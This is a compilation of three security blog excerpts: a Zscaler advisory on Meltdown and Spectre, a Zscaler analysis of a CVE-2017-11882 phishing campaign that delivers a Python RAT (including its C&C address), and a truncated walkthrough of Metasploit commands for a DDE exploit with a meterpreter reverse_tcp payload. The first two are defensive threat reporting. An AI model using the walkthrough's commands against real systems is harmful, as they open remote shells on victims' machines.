Meltdown and Spectre vulnerabilities: What you need to know

Two major security vulnerabilities in processors, dubbed Meltdown and Spectre, were disclosed earlier this week by Google’s Project Zero team. With the ability to allow attackers to gain unauthorized access to sensitive information in memory, Meltdown and Spectre represent a new class of microarchitectural attacks that use processor chip performance optimization features to exploit built-in security mechanisms.
Meltdown exploits the out-of-order execution feature of modern processors, allowing user-level programs to access kernel memory using processor caches as covert side channels. This is specific to the way out-of-order execution is implemented in the processors. This vulnerability has been assigned CVE-2017-5754.
Spectre exploits the speculative execution feature that is present in almost all processors in existence today. Two variants of Spectre are known and seem to depend on what is used to influence erroneous speculative execution. The first variant triggers speculative execution by performing a bounds check bypass and has been assigned CVE-2017-5753. The second variant uses branch target injection for the same effect and has been assigned CVE-2017-5715.
What is vulnerable?
Meltdown has the potential to affect every Intel processor that supports out-of-order execution; essentially all Intel processors since 1995. At the moment it is unclear if AMD and ARM processors are affected by Meltdown. Meltdown exploits the shared kernel-space mapping in the user-space virtual memory. Mitigating this vulnerability involves a technique known as Kernel Page Table Isolation (KPTI), which improves the isolation between kernel-space and user-space memory.
Spectre, on the other hand, affects almost every system in existence: desktops, laptops, cloud servers, tablets, and smartphones. Spectre has been exploited successfully on Intel, AMD, ARM, System Z, and Power 9 processors, among others. There is no single fix for this vulnerability, as it is at an architectural level, and mitigation requires fixes at each application level. Exploitation through JavaScript is also possible.
Meltdown vulnerability impact:
Read arbitrary kernel memory from user space applications
Fully virtualized machines are not affected (guest user space application cannot read host user/kernel space memory)
Hypervisor escape is possible in paravirtualized environment (Xen, Docker, etc.)
Sensitive information disclosure and privilege escalation attacks, as the dumped memory may contain password hashes, private keys, etc.
Spectre vulnerability impact:
Theoretically allows random access to the entire memory-space
Works across Virtual Machines
Practical PoC for user-space to user-space attacks exist at the moment
Harder to exploit than Meltdown
Leaking user-space module addresses and thus bypassing ASLR for further attacks is possible (remote code execution)
What may be impacted?
PCs, laptops, servers, virtualization software, cloud servers, and so on, are all impacted if they are running the vulnerable processor. 
Meltdown: All modern Intel x86 processors are vulnerable. Exploitation is theoretically possible on AMD and ARM, but not yet practically achieved.
Spectre: Intel, ARM, AMD, System Z, and Power 9 processors.
Is the Zscaler cloud infrastructure vulnerable?
Zscaler runs large parts of its cloud software on dedicated bare metal and does not share processors or memory with anyone else. This safeguards Zscaler infrastructure from attacks that can originate from foreign applications that may try to escape the virtual environment and access our memory regions. The attack can only be executed locally with an attacker running malicious code on the same hardware. Since our execution environment is highly guarded and closed, attackers cannot gain access to launch malicious code. Nonetheless, our cloud operations team is actively working on applying necessary patches after carefully evaluating their impact on performance and stability.
Zscaler customers running virtualized private components on their infrastructure should immediately update their hosts so as to prevent VM escape, in which another guest on the same host may browse memory regions used by other virtualized components. Only software updates to the hosts can protect the guests from these exploits, as a guest OS update will not suffice to protect against another compromised guest. It is the customer’s responsibility to apply updates relevant to their infrastructure.
The Zscaler official trust post on this issue can be found here.
Zscaler security coverage for exploitation
We have deployed advanced threat signatures to detect some of the known JavaScript-based exploit POCs.
Advanced threat signatures: JS.Spectre.gen (browser exploit)
We are actively working on deploying an assembly-level detection for the exploitation technique involved in both the Meltdown and Spectre attacks. There are no active ITW exploit attempts of Meltdown or Spectre that Zscaler ThreatLabZ is currently aware of, but we will continue to actively monitor and ensure coverage for our customers.
Mitigation
Zscaler ThreatLabZ highly recommends applying both operating system and application-level patches to safeguard systems against these vulnerabilities.
OS-level patches currently available
FreeBSD patches being worked on: (https://www.freebsd.org/news/newsflash.html#event20180104:01)
Apple Mitigations (https://support.apple.com/en-us/HT208394)
Microsoft Advisory (https://support.microsoft.com/en-us/help/4073119/protect-against-speculative-execution-side-channel-vulnerabilities-in) Note: A small number of anti-virus applications performing unsupported calls to Windows Kernel memory are causing Blue Screen of Death (BSOD) after the use of this patch, so if you didn’t receive the latest Windows security update, you may need to update the AV application first.
Browser patches
Chrome has suggested mitigation from Chrome 63 (released Dec 15) by enabling site-isolation feature. A comprehensive fix will be available in Chrome 64 (releasing Jan 23)
Firefox has short term mitigations available from version 57 (released November)
Microsoft Edge and IE updates are available along with the Windows patch
Virtualization application-level patches
VMware (https://www.vmware.com/us/security/advisories/VMSA-2018-0002.html)
XEN (https://xenbits.xen.org/xsa/advisory-254.html)
Citrix (https://support.citrix.com/article/CTX231399)
Recommendation for cloud apps
Amazon AWS (https://aws.amazon.com/de/security/security-bulletins/AWS-2018-013/)
Microsoft Azure (https://azure.microsoft.com/en-us/blog/securing-azure-customers-from-cpu-vulnerability/)
Google Cloud (https://support.google.com/faqs/answer/7622138)
Conclusion
For those of us in security, 2017 will be remembered for three major ransomware outbreaks and the Equifax data breach. And with such a significant security issue tagged within the first week of the year, 2018 promises to challenging for the security and tech industry.
While we are not aware of any exploit attempts for these vulnerabilities in the wild, it is only a matter of time before we start seeing them. We urge everyone to apply the available security patches.
Zscaler ThreatLabZ will continue to monitor and ensure coverage for any in-the-wild exploit attempts targeting these vulnerabilities.
 

Link: https://www.zscaler.com/blogs/research/meltdown-and-spectre-vulnerabilities-what-you-need-know

CVE-2017-11882 serving RAT and encrypted phishing campaign

Introduction
Malicious documents remain one of the most popular vectors for cybercriminals to deliver malware payloads on a user’s system. While we continue to see many types of VBA macro-based malware, there has been an increasing trend in malicious documents using the DDE protocol for delivering malware executables, which we wrote about last month. Microsoft released a security update last week that should significantly reduce the number of DDE-based attacks:
“Microsoft has released an update for Microsoft Office that provides enhanced security as a defense-in-depth measure. The update disables the Dynamic Update Exchange protocol (DDE) in all supported editions of Microsoft Word." – Microsoft Security Advisory
Zscaler ThreatLabZ has been tracking a new vector involving malicious RTF document files weaponized with the recently disclosed Microsoft memory corruption vulnerability, CVE-2017-11882. In this blog, we will review a recent campaign leveraging this exploit and also share insights on encrypted phishing campaigns.
Infection cycle
In our research into this new exploit, we encountered spam phishing emails containing a malicious document attachment that leads to a Remote Access Trojan (RAT) and an encrypted phishing page.
The complete workflow of this campaign is shown below:
Fig 1: Workflow
The malware is received by the victim in a phishing email with a password-protected archive as the attachment.
An example of one such phishing email can be seen below:
Fig 2: Phishing scam email
The attachment is a password-protected ZIP file, which prevents auto-analysis systems from extracting and analyzing malicious files.
After the extraction of the  ZIP file with the password given in the email, we are presented with an RTF document file. This RTF file exploits the CVE-2017-11882 vulnerability in Microsoft Office software to execute malicious code. Using this vulnerability, the attacker can install malware, access data, or create a new account with full access rights.
Once the document is opened, it shows a plain document to the user. However, in the background it downloads and executes a RAT; as it does, it shows the phishing email content to the user, which leads to a phishing site.
The malicious RTF document file is shown below.
Fig 3: After HEX-to-ASCII conversion.
The RTF file contains the link to "note,"’ which is an HTML application that is remotely executed by mshta.exe.
In the header section of note.hta, there is VBScript code that is executed when the file is loaded.
Fig 4: Header section of note.hta
After decoding, the code looks like this.
Fig 5: Decoded PowerShell code inside VBScript of note.hta
The VBScript in note.hta creates a hidden PowerShell process, which downloads malware named clear.exe, stores it in %TEMP% directory with the name clear.exe, and executes it.
Clear.exe is inherently a Python module that is converted from Python to EXE.
After the reverse engineering of clear.exe, we get the malicious Python script, which looks like a RAT client.
The RAT client connects with the Command & Control (C&C) server IP 197.200.145[.]178 on port 2016.
It has a couple of tasks that will be executed when the C&C server sends a command request.
Fig 6: RAT commands (clear.exe)
RAT C&C commands supported:
Kill – kill client connection
Selfdestruct – kill client connection and remove traces of exploit
Quit – close socket and connection
Persistence – make RAT client persistent in system
Scan – scan TCP ports
Survey – run a system survey
Cat

Link: https://www.zscaler.com/blogs/research/cve-2017-11882-serving-rat-and-encrypted-phishing-campaign

Exploit Microsoft Office DDE Command Execution Vulnerability

Download module wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb Move module into framework mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/ Open Metasploit and load exploit msfconsole reload_all use exploit/windows/dde_delivery Set the sever host set SRVHOST 192.168.1.10 Choose payload and run it set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.10 set LPORT 443 exploit Copy paste the code into any word/excel document. Open Word/Excel. Create a new …

Link: http://securityblog.gr/4478/exploit-microsoft-office-dde-command-execution-vulnerability/